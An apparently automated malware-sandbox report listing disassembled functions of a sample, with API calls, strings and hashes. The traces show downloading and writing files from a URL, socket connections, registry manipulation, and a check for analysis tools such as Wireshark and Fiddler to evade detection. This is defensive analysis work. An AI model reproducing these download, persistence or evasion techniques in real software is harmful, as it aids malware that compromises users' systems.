                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                                  • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                  • API String ID: 3970221696-33419044
                                                                                                  • Opcode ID: 9a5825c77f4b722d79db32689b318e233805ad7fb7879efd131882d8c81d0f5c
                                                                                                  • Instruction ID: c1b2fc06dce978e0177cc34d92fab5baf7feed202629db46752678c6b6f5c2c1
                                                                                                  • Opcode Fuzzy Hash: 9a5825c77f4b722d79db32689b318e233805ad7fb7879efd131882d8c81d0f5c
                                                                                                  • Instruction Fuzzy Hash: 5451EDB195031876DB30EB60DD89FEE7378DF54700F404595AA09A52D0EBB0DE88CFA5
                                                                                                  Function 02D07C80 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 141libraryloaderfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(wininet.dll), ref: 02D07CC3
                                                                                                  • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 02D07CD7
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 02D07CF7
                                                                                                  • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 02D07D16
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02D07D53
                                                                                                  • _memset.LIBCMT ref: 02D07D7E
                                                                                                  • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02D07D8C
                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02D07DDB
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D07DF9
                                                                                                  • Sleep.KERNEL32(00000001), ref: 02D07E01
                                                                                                  • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02D07E0D
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 02D07E28
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                                  • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                  • API String ID: 1463273941-1099148085
                                                                                                  • Opcode ID: 54ed9acea33c795fde60ba3a32756cefb6197cd39ad6bac79bc83e4827ba5325
                                                                                                  • Instruction ID: 97d1f43d4b2402b82f7a3833e05b86851a69ee6911ea4cb4a4c893a97d3d42b7
                                                                                                  • Opcode Fuzzy Hash: 54ed9acea33c795fde60ba3a32756cefb6197cd39ad6bac79bc83e4827ba5325
                                                                                                  • Instruction Fuzzy Hash: 0C417471A80228AAE7349B649C45FDAB3F8FF54700F11C5A5F645A62C0DE705E49CFE4
                                                                                                  Function 02D04530 Relevance: 27.2, APIs: 18, Instructions: 247threadnetworksleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000064), ref: 02D0455A
                                                                                                  • timeGetTime.WINMM ref: 02D0457B
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0459B
                                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D045BD
                                                                                                  • SwitchToThread.KERNEL32 ref: 02D045D7
                                                                                                  • SetEvent.KERNEL32(?), ref: 02D04620
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D04644
                                                                                                  • send.WS2_32(?,02D249C0,00000010,00000000), ref: 02D04668
                                                                                                  • SetEvent.KERNEL32(?), ref: 02D04686
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D04691
                                                                                                  • WSACloseEvent.WS2_32(?), ref: 02D0469F
                                                                                                  • shutdown.WS2_32(?,00000001), ref: 02D046B3
                                                                                                  • closesocket.WS2_32(?), ref: 02D046BD
                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 02D046F6
                                                                                                  • SetLastError.KERNEL32(000005B4), ref: 02D0470A
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0472B
                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D04743
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1692523546-0
                                                                                                  • Opcode ID: 4df579e36734c8b2e01fc89a121476b97086f5480643761564537be45301f730
                                                                                                  • Instruction ID: 2d17144a41670773f379fe19ff99764984a7c8f2263d31a166974088511a9206
                                                                                                  • Opcode Fuzzy Hash: 4df579e36734c8b2e01fc89a121476b97086f5480643761564537be45301f730
                                                                                                  • Instruction Fuzzy Hash: C1919B70A00612ABC728DF64D8C8FAAB7A5FF54705F108519EA168B7A0D771FCA5CBD0
                                                                                                  Function 02D0A6F0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 254COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$swprintf$_malloc
                                                                                                  • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                                  • API String ID: 1873853019-591889663
                                                                                                  • Opcode ID: 1e661cde7c9103053396c25c7d2d65cc05d35739ce12a908904b346bfd5135c4
                                                                                                  • Instruction ID: b1596ff9dd56110b986c26124b4d96ce41fbfcc148287c378189cc0b04ecca64
                                                                                                  • Opcode Fuzzy Hash: 1e661cde7c9103053396c25c7d2d65cc05d35739ce12a908904b346bfd5135c4
                                                                                                  • Instruction Fuzzy Hash: 3381DEB5A40300ABE720AB24ECC6F6A77A5EF55714F144064E9095F3D2EB71ED14CAF2
                                                                                                  Function 02D05CC0 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 164windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsWindowVisible.USER32(?), ref: 02D05CD3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: VisibleWindow
                                                                                                  • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                                  • API String ID: 1208467747-3439171801
                                                                                                  • Opcode ID: 9e0b6000161f6ef2eeb8daf8674c33bc07627c933c7ea2cd4e266ea9b2272c90
                                                                                                  • Instruction ID: 9747b58cd053d246f3cd875f7cd91938c8c9a4a397c35f50baa00c18452c2210
                                                                                                  • Opcode Fuzzy Hash: 9e0b6000161f6ef2eeb8daf8674c33bc07627c933c7ea2cd4e266ea9b2272c90
                                                                                                  • Instruction Fuzzy Hash: 514196B1E41A2175BA613531BC82FDF22495D3278BF984024EC49E0791F74AAE5DCCFA
                                                                                                  Function 00974530 Relevance: 24.2, APIs: 16, Instructions: 180threadnetworksleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000064), ref: 0097455A
                                                                                                  • timeGetTime.WINMM ref: 0097457B
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0097459B
                                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009745BD
                                                                                                  • SwitchToThread.KERNEL32 ref: 009745D7
                                                                                                  • SetEvent.KERNEL32(?), ref: 00974620
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00974644
                                                                                                  • send.WS2_32(?,00987440,00000010,00000000), ref: 00974668
                                                                                                  • SetEvent.KERNEL32(?), ref: 00974686
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 00974691
                                                                                                  • WSACloseEvent.WS2_32(?), ref: 0097469F
                                                                                                  • shutdown.WS2_32(?,00000001), ref: 009746B3
                                                                                                  • closesocket.WS2_32(?), ref: 009746BD
                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 009746F6
                                                                                                  • SetLastError.KERNEL32(000005B4), ref: 0097470A
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0098FA44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                  • String ID:
                                                                                                  • API String ID: 3448239111-0
                                                                                                  • Opcode ID: 380fa51ae3a77a678d7532d7fe40152b3a1e3aacf8a2ca6863a1748a761c9938
                                                                                                  • Instruction ID: 3591f1674baa5c224707ef5b5aca23be8a49600d11a8352f12ee9f65ac0e65ae
                                                                                                  • Opcode Fuzzy Hash: 380fa51ae3a77a678d7532d7fe40152b3a1e3aacf8a2ca6863a1748a761c9938
                                                                                                  • Instruction Fuzzy Hash: 1C51FC76604A22EFC724DF64C888BA9F7A9FF45701F108129F5098BA91C774F8A4DBD0
                                                                                                  Function 02D0DA30 Relevance: 21.3, APIs: 14, Instructions: 254COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,02D0A8C1,?,?), ref: 02D0DA43
                                                                                                  • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,02D0A8C1,?,?), ref: 02D0DA62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1452528299-0
                                                                                                  • Opcode ID: 7a4a4a4b3b4b611704144b9d8149c59e95ee61787d8bdc4364f823edf7faa43e
                                                                                                  • Instruction ID: 04e7b6443055199691acb4a7a5508b0a58c193d08e654f5cc92bc31e6ba94ee6
                                                                                                  • Opcode Fuzzy Hash: 7a4a4a4b3b4b611704144b9d8149c59e95ee61787d8bdc4364f823edf7faa43e
                                                                                                  • Instruction Fuzzy Hash: ED81CF72B002009FD720DFA9E884B6AB7E6FB58319F04456AE909C7790E7B1ED54CB90
                                                                                                  Function 02D0C5E0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0C63D
                                                                                                  • _memset.LIBCMT ref: 02D0C64C
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 02D0C66F
                                                                                                    • Part of subcall function 02D0C81E: RegCloseKey.ADVAPI32(80000000,02D0C7FA), ref: 02D0C82B
                                                                                                    • Part of subcall function 02D0C81E: RegCloseKey.ADVAPI32(00000000), ref: 02D0C834
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close_memset$Open
                                                                                                  • String ID: %08X
                                                                                                  • API String ID: 4292648718-3773563069
                                                                                                  • Opcode ID: 2c66b927fee4779e78bd18516465f0d3ebf7cc5ed3b377048cbde634a57d14b3
                                                                                                  • Instruction ID: 75e1fd4dbd5ee1908bcb80eb83907e04906dcb21cad67462267db71f3a56fd92
                                                                                                  • Opcode Fuzzy Hash: 2c66b927fee4779e78bd18516465f0d3ebf7cc5ed3b377048cbde634a57d14b3
                                                                                                  • Instruction Fuzzy Hash: FD5131B2A50218ABEB24DF50DD85FEA7778EB48704F404699F705A7280D774AF48CFA4
                                                                                                  Function 02D036F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 02D03710
                                                                                                  • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02D03749
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02D03766
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02D03779
                                                                                                  • WSACreateEvent.WS2_32 ref: 02D0377B
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,02D31F0C), ref: 02D0378D
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,02D31F0C), ref: 02D03799
                                                                                                  • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,02D31F0C), ref: 02D037B8
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,02D31F0C), ref: 02D037C4
                                                                                                  • gethostbyname.WS2_32(00000000), ref: 02D037D2
                                                                                                  • htons.WS2_32(?), ref: 02D037F8
                                                                                                  • WSAEventSelect.WS2_32(?,?,00000030), ref: 02D03816
                                                                                                  • connect.WS2_32(?,?,00000010), ref: 02D0382B
                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,02D31F0C), ref: 02D0383A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                  • String ID:
                                                                                                  • API String ID: 1455939504-0
                                                                                                  • Opcode ID: 2d7e5a5cb4a0ab31c9c2ea49bd17e3c1e654252cd0b7c5759a134b463afc5b1b
                                                                                                  • Instruction ID: d8dd0e6efa7d77c90695b418201a1a7356bdb006f3978b3fbc586bf009121cd0
                                                                                                  • Opcode Fuzzy Hash: 2d7e5a5cb4a0ab31c9c2ea49bd17e3c1e654252cd0b7c5759a134b463afc5b1b
                                                                                                  • Instruction Fuzzy Hash: 9D415D71A40305ABE724DBA4DC89F7BB7B8FB98710F104919FA15963D0C774A914CB64
                                                                                                  Function 009736F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 00973710
                                                                                                  • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 00973749
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 00973766
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 00973779
                                                                                                  • WSACreateEvent.WS2_32 ref: 0097377B
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,0098D990), ref: 0097378D
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,0098D990), ref: 00973799
                                                                                                  • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,0098D990), ref: 009737B8
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0098D990), ref: 009737C4
                                                                                                  • gethostbyname.WS2_32(00000000), ref: 009737D2
                                                                                                  • htons.WS2_32(?), ref: 009737F8
                                                                                                  • WSAEventSelect.WS2_32(?,?,00000030), ref: 00973816
                                                                                                  • connect.WS2_32(?,?,00000010), ref: 0097382B
                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,0098D990), ref: 0097383A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                  • String ID:
                                                                                                  • API String ID: 1455939504-0
                                                                                                  • Opcode ID: b90255ba3184a959594cf5356ae08f63c30be67e708bee2a56c02e51913be7b1
                                                                                                  • Instruction ID: 3743defb960168006d01c01e9f2ce7ea57ee57b1e07b7c15f677d683ef6eaa3f
                                                                                                  • Opcode Fuzzy Hash: b90255ba3184a959594cf5356ae08f63c30be67e708bee2a56c02e51913be7b1
                                                                                                  • Instruction Fuzzy Hash: D9416FB1A04605AFE710DFA4DC89FBFB7B8EF88710F108619FA15A72D0C674A904DB61
                                                                                                  Function 00925497 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 263COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: !jWW$.$_$e$i$l${vU_
                                                                                                  • API String ID: 2102423945-159827627
                                                                                                  • Opcode ID: 616728f120ea76b6708cf09b79b5274985df2719d774fb6e82631f5eb7c08bb3
                                                                                                  • Instruction ID: cfdf210252503e282b0764220cd2f34b8bb988635bfa3f0ef7e4e4d6afaac58b
                                                                                                  • Opcode Fuzzy Hash: 616728f120ea76b6708cf09b79b5274985df2719d774fb6e82631f5eb7c08bb3
                                                                                                  • Instruction Fuzzy Hash: 7191C4B5A00624AFE720DFA0DC84FAA77BDFB88700F548158FA099B245D7B5DA40CB91
                                                                                                  Function 02D0AA10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 190sleeptimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocalTime.KERNEL32(?,7A8163DF), ref: 02D0AA58
                                                                                                  • wsprintfW.USER32 ref: 02D0AA8F
                                                                                                  • _memset.LIBCMT ref: 02D0AAA7
                                                                                                  • _memset.LIBCMT ref: 02D0AABA
                                                                                                    • Part of subcall function 02D08020: lstrlenW.KERNEL32(?), ref: 02D08038
                                                                                                    • Part of subcall function 02D08020: _memset.LIBCMT ref: 02D08042
                                                                                                    • Part of subcall function 02D08020: lstrlenW.KERNEL32(?), ref: 02D0804B
                                                                                                    • Part of subcall function 02D08020: lstrlenW.KERNEL32(?), ref: 02D08056
                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D0ABBE
                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 02D0AC6E
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D0ACAA
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                    • Part of subcall function 02D09730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,7A8163DF,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E,00000000), ref: 02D09773
                                                                                                    • Part of subcall function 02D09730: InitializeCriticalSectionAndSpinCount.KERNEL32(02D0E1AE,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D09812
                                                                                                    • Part of subcall function 02D09730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D09850
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                                                                                  • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                                                                                  • API String ID: 1254190970-1225219777
                                                                                                  • Opcode ID: ebb9f6ea921f12d82a9453dfc8d539a7144e1c58dcc8e6fb042b22007f0c1b1d
                                                                                                  • Instruction ID: f2fc1edb13427e5336a6553608add6b306c54964a7dffaecbbc219b852c5e009
                                                                                                  • Opcode Fuzzy Hash: ebb9f6ea921f12d82a9453dfc8d539a7144e1c58dcc8e6fb042b22007f0c1b1d
                                                                                                  • Instruction Fuzzy Hash: 54618EB1508340ABD360DF64D8C4FABB7E9EF98714F104A1DF68992390E7349D48CBA6
                                                                                                  Function 02D0C860 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66registrystringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 02D0C889
                                                                                                  • RegDeleteValueW.ADVAPI32(?), ref: 02D0C894
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 02D0C8A4
                                                                                                  • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 02D0C8C3
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D0C8D1
                                                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 02D0C8E4
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 02D0C8F2
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 02D0C900
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close$Value$CreateDeleteOpenlstrlen
                                                                                                  • String ID: AppEvents$Network
                                                                                                  • API String ID: 3935456190-3733486940
                                                                                                  • Opcode ID: be6d5f807bc844bbd30257f1873f0c70ff319a56a09dadcb6ee18d87ffcd06d9
                                                                                                  • Instruction ID: 2481ad7c4e0f9a0362ce30f4d35c97e28d806a36f89934670b2bb1b939e33388
                                                                                                  • Opcode Fuzzy Hash: be6d5f807bc844bbd30257f1873f0c70ff319a56a09dadcb6ee18d87ffcd06d9
                                                                                                  • Instruction Fuzzy Hash: 92119175B00214FFE724CAA5ED89FABB37CEB58714F600549FA0197340D671AE14D7A8
                                                                                                  Function 0282A0AF Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$swprintf$_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1873853019-0
                                                                                                  • Opcode ID: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                  • Instruction ID: 598d35966bd8e274126a70a166313638d1bf20b21bcd468aa2076d8250227c1f
                                                                                                  • Opcode Fuzzy Hash: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                  • Instruction Fuzzy Hash: EB81F4BD940210ABE720EB58DC85F6B77A5EF55310F184064EE099F382EB71E944CAE7
                                                                                                  Function 03FAE9AB Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$swprintf$_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1873853019-0
                                                                                                  • Opcode ID: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                  • Instruction ID: 32e6c3f391c3f737f3a82ef66755ecff9e351077b7bf169f12b5afc226b6bfe7
                                                                                                  • Opcode Fuzzy Hash: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                  • Instruction Fuzzy Hash: FF81C3F9A40700ABE720EF58DC85FAB77A4AF54710F184164EE095F386EB71E910C7A6
                                                                                                  Function 00975A20 Relevance: 16.7, APIs: 11, Instructions: 227timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,7E81BFB0), ref: 00975A65
                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00975B04
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00975B42
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00975B67
                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00975C5F
